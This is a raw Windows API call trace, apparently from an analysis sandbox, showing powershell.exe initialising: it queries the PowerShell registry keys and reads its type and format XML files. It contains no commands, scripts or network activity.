	[0630.310] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6c8 | out: phkResult=0x12d6c8*=0x324) returned 0x0
	[0630.311] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d64c, lpData=0x0, lpcbData=0x12d648*=0x0 | out: lpType=0x12d64c*=0x1, lpData=0x0, lpcbData=0x12d648*=0x56) returned 0x0
	[0630.311] CoTaskMemAlloc (cb=0x5a) returned 0x1b7a4f90
	[0630.311] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d61c, lpData=0x1b7a4f90, lpcbData=0x12d618*=0x56 | out: lpType=0x12d61c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d618*=0x56) returned 0x0
	[0630.311] CoTaskMemFree (pv=0x1b7a4f90) 
	[0630.311] RegCloseKey (hKey=0x324) returned 0x0
	[0630.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0630.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0630.358] VirtualQuery (in: lpAddress=0x12c3b0, lpBuffer=0x12d270, dwLength=0x30 | out: lpBuffer=0x12d270*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0630.367] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0630.367] GetFileType (hFile=0x324) returned 0x1
	[0630.367] SetErrorMode (uMode=0x1) returned 0x1
	[0630.367] GetFileType (hFile=0x324) returned 0x1
	[0630.367] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.336] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.336] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.336] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.337] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.337] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.337] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.337] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.338] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.340] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.340] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.341] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.341] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.341] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.342] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.342] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.342] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.346] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.347] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.347] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.347] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.348] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.348] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.349] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.349] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.349] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.350] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.350] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.351] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.351] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.351] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.352] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.352] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.359] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.359] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.360] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.360] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.360] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.361] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.361] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.362] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0633.362] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x1b4, lpOverlapped=0x0) returned 1
	[0633.362] ReadFile (in: hFile=0x324, lpBuffer=0x2c92218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2c92218*, lpNumberOfBytesRead=0x12d668*=0x0, lpOverlapped=0x0) returned 1
	[0633.362] CloseHandle (hObject=0x324) returned 1
	[0635.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0635.971] SetErrorMode (uMode=0x1) returned 0x1
	[0635.971] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d5e0 | out: lpFileInformation=0x12d5e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0638.277] SetErrorMode (uMode=0x1) returned 0x1
	[0638.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0638.277] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6c8 | out: phkResult=0x12d6c8*=0x324) returned 0x0
	[0638.278] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d64c, lpData=0x0, lpcbData=0x12d648*=0x0 | out: lpType=0x12d64c*=0x1, lpData=0x0, lpcbData=0x12d648*=0x56) returned 0x0
	[0638.278] CoTaskMemAlloc (cb=0x5a) returned 0x1b7a5150
	[0638.278] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d61c, lpData=0x1b7a5150, lpcbData=0x12d618*=0x56 | out: lpType=0x12d61c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d618*=0x56) returned 0x0
	[0638.278] CoTaskMemFree (pv=0x1b7a5150) 
	[0638.278] RegCloseKey (hKey=0x324) returned 0x0
	[0638.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0638.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0647.549] VirtualQuery (in: lpAddress=0x12c3b0, lpBuffer=0x12d270, dwLength=0x30 | out: lpBuffer=0x12d270*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0652.733] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0652.733] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0652.733] CoTaskMemFree (pv=0x31a0f0) 
	[0654.518] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d868 | out: phkResult=0x12d868*=0x324) returned 0x0
	[0654.518] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x12d87c, lpData=0x0, lpcbData=0x12d878*=0x0 | out: lpType=0x12d87c*=0x1, lpData=0x0, lpcbData=0x12d878*=0x74) returned 0x0
	[0654.518] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x12d7ec, lpData=0x0, lpcbData=0x12d7e8*=0x0 | out: lpType=0x12d7ec*=0x1, lpData=0x0, lpcbData=0x12d7e8*=0x74) returned 0x0
	[0654.518] CoTaskMemAlloc (cb=0x78) returned 0x2a13e0
	[0654.518] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x12d7bc, lpData=0x2a13e0, lpcbData=0x12d7b8*=0x74 | out: lpType=0x12d7bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x12d7b8*=0x74) returned 0x0
	[0654.518] CoTaskMemFree (pv=0x2a13e0) 
	[0654.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0654.519] SetErrorMode (uMode=0x1) returned 0x1
	[0654.519] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x12d740 | out: lpFileInformation=0x12d740*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0654.519] SetErrorMode (uMode=0x1) returned 0x1
	[0656.504] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0656.504] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0656.504] CoTaskMemFree (pv=0x31a0f0) 
	[0656.515] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0656.515] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0656.516] CoTaskMemFree (pv=0x31a0f0) 
	[0656.517] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0656.517] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0656.517] CoTaskMemFree (pv=0x31a0f0) 
	[0656.519] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0656.519] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0656.519] CoTaskMemFree (pv=0x31a0f0) 
	[0656.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0656.520] SetErrorMode (uMode=0x1) returned 0x1
	[0656.520] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0656.520] GetFileType (hFile=0x2f8) returned 0x1
	[0656.520] SetErrorMode (uMode=0x1) returned 0x1
	[0656.520] GetFileType (hFile=0x2f8) returned 0x1
	[0656.521] ReadFile (in: hFile=0x2f8, lpBuffer=0x32d4558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x32d4558*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0656.523] ReadFile (in: hFile=0x2f8, lpBuffer=0x32d4558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x32d4558*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0656.523] ReadFile (in: hFile=0x2f8, lpBuffer=0x32d4558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x32d4558*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0656.524] ReadFile (in: hFile=0x2f8, lpBuffer=0x32d4558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x32d4558*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0656.525] ReadFile (in: hFile=0x2f8, lpBuffer=0x32d4558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x32d4558*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0656.525] ReadFile (in: hFile=0x2f8, lpBuffer=0x32d4558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x32d4558*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0656.525] ReadFile (in: hFile=0x2f8, lpBuffer=0x32d4558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x32d4558*, lpNumberOfBytesRead=0x12d3d8*=0x9e2, lpOverlapped=0x0) returned 1
	[0656.525] ReadFile (in: hFile=0x2f8, lpBuffer=0x32d3aa2, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x32d3aa2*, lpNumberOfBytesRead=0x12d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0656.525] ReadFile (in: hFile=0x2f8, lpBuffer=0x32d4558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x32d4558*, lpNumberOfBytesRead=0x12d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0656.526] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d468 | out: phkResult=0x12d468*=0x2f8) returned 0x0
	[0656.526] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d3ec, lpData=0x0, lpcbData=0x12d3e8*=0x0 | out: lpType=0x12d3ec*=0x1, lpData=0x0, lpcbData=0x12d3e8*=0x56) returned 0x0
	[0656.526] CoTaskMemAlloc (cb=0x5a) returned 0x30b540
	[0656.526] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d3bc, lpData=0x30b540, lpcbData=0x12d3b8*=0x56 | out: lpType=0x12d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d3b8*=0x56) returned 0x0
	[0656.526] CoTaskMemFree (pv=0x30b540) 
	[0656.526] RegCloseKey (hKey=0x2f8) returned 0x0
	[0656.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0656.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0656.535] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xf1c12b5b, Data2=0x6d9f, Data3=0x4aad, Data4=([0]=0xb7, [1]=0x19, [2]=0x15, [3]=0xba, [4]=0xee, [5]=0xb9, [6]=0x3d, [7]=0x79))) returned 0x0
	[0656.540] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x348e3049, Data2=0x7576, Data3=0x498b, Data4=([0]=0x93, [1]=0x3f, [2]=0x56, [3]=0x70, [4]=0x2f, [5]=0xb7, [6]=0x89, [7]=0xb1))) returned 0x0
	[0656.541] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0656.541] GetFileType (hFile=0x2f8) returned 0x1
	[0656.541] SetErrorMode (uMode=0x1) returned 0x1
	[0656.541] GetFileType (hFile=0x2f8) returned 0x1
	[0656.541] ReadFile (in: hFile=0x2f8, lpBuffer=0x32ff0c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x32ff0c0*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
